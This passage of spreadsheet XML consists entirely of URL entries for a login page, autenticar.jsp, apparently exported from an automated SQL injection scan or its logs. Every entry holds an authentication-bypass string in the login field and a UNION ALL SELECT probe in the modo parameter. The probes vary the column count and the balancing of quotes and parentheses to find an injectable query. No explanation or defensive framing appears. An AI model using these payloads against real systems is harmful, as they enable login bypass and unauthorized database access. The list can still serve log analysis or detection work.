    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect6262,6262,6262,6262,6262,6262--and(1531=1531</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect7021,7021,7021,7021,7021,7021,7021--and(5157=5157</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect1874,1874,1874,1874,1874,1874,1874,1874--and(7622=7622</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect3175,3175,3175,3175,3175,3175,3175,3175,3175--and(9642=9642</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect9985,9985,9985,9985,9985,9985,9985,9985,9985,9985--and(9232=9232</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect5647--and((3963=3963</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect7482,7482--and((6964=6964</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect1496,1496,1496--and((7047=7047</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect9894,9894,9894,9894--and((3382=3382</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect279,279,279,279,279--and((9419=9419</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect4838,4838,4838,4838,4838,4838--and((1704=1704</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect1121,1121,1121,1121,1121,1121,1121--and((9148=9148</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect2242,2242,2242,2242,2242,2242,2242,2242--and((9870=9870</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect2614,2614,2614,2614,2614,2614,2614,2614,2614--and((3054=3054</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect4157,4157,4157,4157,4157,4157,4157,4157,4157,4157--and((573=573</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect6519--and(((756=756</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect956,956--and(((3461=3461</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect7082,7082,7082--and(((4758=4758</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect6104,6104,6104,6104--and(((647=647</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect1158,1158,1158,1158,1158--and(((7840=7840</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect436,436,436,436,436,436--and(((8120=8120</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect4214,4214,4214,4214,4214,4214,4214--and(((2395=2395</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect6869,6869,6869,6869,6869,6869,6869,6869--and(((66=66</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect858,858,858,858,858,858,858,858,858--and(((132=132</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect7650,7650,7650,7650,7650,7650,7650,7650,7650,7650--and(((4664=4664</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect4009--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect2631,2631--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect332,332,332--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect9646,9646,9646,9646--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect9331,9331,9331,9331,9331--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect1321,1321,1321,1321,1321,1321--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect3541,3541,3541,3541,3541,3541,3541--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect7711,7711,7711,7711,7711,7711,7711,7711--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect3012,3012,3012,3012,3012,3012,3012,3012,3012--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect110,110,110,110,110,110,110,110,110,110--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect4242--and('nnaw'='nnaw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect3511,3511--and('fiua'='fiua</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6364,6364,6364--and('ydyi'='ydyi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1370,1370,1370,1370--and('rakt'='rakt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect461,461,461,461,461--and('gezk'='gezk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6816,6816,6816,6816,6816,6816--and('vphd'='vphd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect8453,8453,8453,8453,8453,8453,8453--and('ovuh'='ovuh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect5948,5948,5948,5948,5948,5948,5948,5948--and('gdug'='gdug</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect8719,8719,8719,8719,8719,8719,8719,8719,8719--and('clgn'='clgn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect132,132,132,132,132,132,132,132,132,132--and('laqn'='laqn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect2506--and(('aknj'='aknj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect4398,4398--and(('njem'='njem</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect940,940,940--and(('lsgy'='lsgy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect7497,7497,7497,7497--and(('kdpo'='kdpo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect6375,6375,6375,6375,6375--and(('zspa'='zspa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect5016,5016,5016,5016,5016,5016--and(('vjtp'='vjtp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect7021,7021,7021,7021,7021,7021,7021--and(('rxxx'='rxxx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect1838,1838,1838,1838,1838,1838,1838,1838--and(('yfdm'='yfdm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect4072,4072,4072,4072,4072,4072,4072,4072,4072--and(('tfhf'='tfhf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect2548,2548,2548,2548,2548,2548,2548,2548,2548,2548--and(('hmky'='hmky</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect7157--and((('zxsg'='zxsg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect4939,4939--and((('ilpy'='ilpy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect6499,6499,6499--and((('eqkd'='eqkd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect2846,2846,2846,2846--and((('ankc'='ankc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect5578,5578,5578,5578,5578--and((('kqzd'='kqzd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect9263,9263,9263,9263,9263,9263--and((('xygc'='xygc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect3268,3268,3268,3268,3268,3268,3268--and((('icnu'='icnu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect8960,8960,8960,8960,8960,8960,8960,8960--and((('ezkx'='ezkx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect8555,8555,8555,8555,8555,8555,8555,8555,8555--and((('ayip'='ayip</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect7963,7963,7963,7963,7963,7963,7963,7963,7963,7963--and((('muza'='muza</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect6208--and'bumf'='bumf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect8979,8979--and'uvxw'='uvxw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect4345,4345,4345--and'xysa'='xysa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect172,172,172,172--and'iukz'='iukz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect3162,3162,3162,3162,3162--and'cxgi'='cxgi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect2882,2882,2882,2882,2882,2882--and'lhrb'='lhrb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect3297,3297,3297,3297,3297,3297,3297--and'ybfi'='ybfi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect9525,9525,9525,9525,9525,9525,9525,9525--and'rski'='rski</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect9783,9783,9783,9783,9783,9783,9783,9783,9783--and'dfrq'='dfrq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect8033,8033,8033,8033,8033,8033,8033,8033,8033,8033--and'xqwv'='xqwv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect3323--and('rqme'like'rqme</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect431,431--and('rjvs'like'rjvs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect5047,5047,5047--and('znwe'like'znwe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect8125,8125,8125,8125--and('tlbw'like'tlbw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect2754,2754,2754,2754,2754--and('olov'like'olov</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect7246,7246,7246,7246,7246,7246--and('zzwg'like'zzwg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1623,1623,1623,1623,1623,1623,1623--and('tobt'like'tobt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1909,1909,1909,1909,1909,1909,1909,1909--and('cgaj'like'cgaj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect483,483,483,483,483,483,483,483,483--and('pfuj'like'pfuj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6296,6296,6296,6296,6296,6296,6296,6296,6296,6296--and('xpqp'like'xpqp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect7291--and(('hpjp'like'hpjp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect816,816--and(('cgek'like'cgek</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect1192,1192,1192--and(('cxrn'like'cxrn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect8524,8524,8524,8524--and(('ynwv'like'ynwv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect9172,9172,9172,9172,9172--and(('nvmd'like'nvmd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect638,638,638,638,638,638--and(('tkwk'like'tkwk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect3068,3068,3068,3068,3068,3068,3068--and(('gmwk'like'gmwk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect8461,8461,8461,8461,8461,8461,8461,8461--and(('buht'like'buht</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect2433,2433,2433,2433,2433,2433,2433,2433,2433--and(('dfbd'like'dfbd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect8297,8297,8297,8297,8297,8297,8297,8297,8297,8297--and(('mglf'like'mglf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect3183--and((('cusz'like'cusz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect7802,7802--and((('fnfa'like'fnfa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect1115,1115,1115--and((('zvyb'like'zvyb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect4740,4740,4740,4740--and((('yefm'like'yefm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect5168,5168,5168,5168,5168--and((('nfzh'like'nfzh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect374,374,374,374,374,374--and((('gubl'like'gubl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect5612,5612,5612,5612,5612,5612,5612--and((('rnnh'like'rnnh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect6345,6345,6345,6345,6345,6345,6345,6345--and((('yhdi'like'yhdi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect173,173,173,173,173,173,173,173,173--and((('qsvv'like'qsvv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect7207,7207,7207,7207,7207,7207,7207,7207,7207,7207--and((('yzca'like'yzca</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect2425--and'occh'like'occh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect4207,4207--and'yymz'like'yymz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect3545,3545,3545--and'tkyl'like'tkyl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect941,941,941,941--and'prhg'like'prhg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect5778,5778,5778,5778,5778--and'gmlu'like'gmlu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect2341,2341,2341,2341,2341,2341--and'zaln'like'zaln</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect7911,7911,7911,7911,7911,7911,7911--and'avoc'like'avoc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect8859,8859,8859,8859,8859,8859,8859,8859--and'rkep'like'rkep</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect891,891,891,891,891,891,891,891,891--and'exmy'like'exmy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect7100,7100,7100,7100,7100,7100,7100,7100,7100,7100--and'esig'like'esig</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect5961--and("hfml"="hfml</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect6337,6337--and("gifs"="gifs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect3495,3495,3495--and("lvhr"="lvhr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect8297,8297,8297,8297--and("uaug"="uaug</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect3418,3418,3418,3418,3418--and("pgys"="pgys</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect5478,5478,5478,5478,5478,5478--and("dmon"="dmon</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect3730,3730,3730,3730,3730,3730,3730--and("voob"="voob</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect4410,4410,4410,4410,4410,4410,4410,4410--and("kdls"="kdls</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect3383,3383,3383,3383,3383,3383,3383,3383,3383--and("xojx"="xojx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect966,966,966,966,966,966,966,966,966,966--and("hqeh"="hqeh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect1870--and(("dmcw"="dmcw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect4357,4357--and(("zeag"="zeag</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect6311,6311,6311--and(("zfde"="zfde</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect7083,7083,7083,7083--and(("pgko"="pgko</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect9451,9451,9451,9451,9451--and(("rogy"="rogy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect2564,2564,2564,2564,2564,2564--and(("qsas"="qsas</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect3851,3851,3851,3851,3851,3851,3851--and(("oqmc"="oqmc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect1117,1117,1117,1117,1117,1117,1117,1117--and(("vjnf"="vjnf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect5254,5254,5254,5254,5254,5254,5254,5254,5254--and(("unos"="unos</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect9740,9740,9740,9740,9740,9740,9740,9740,9740,9740--and(("wkfo"="wkfo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect5975--and((("iruh"="iruh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect8246,8246--and((("ijxm"="ijxm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect3457,3457,3457--and((("urzn"="urzn</t>
  </si>
  <si>
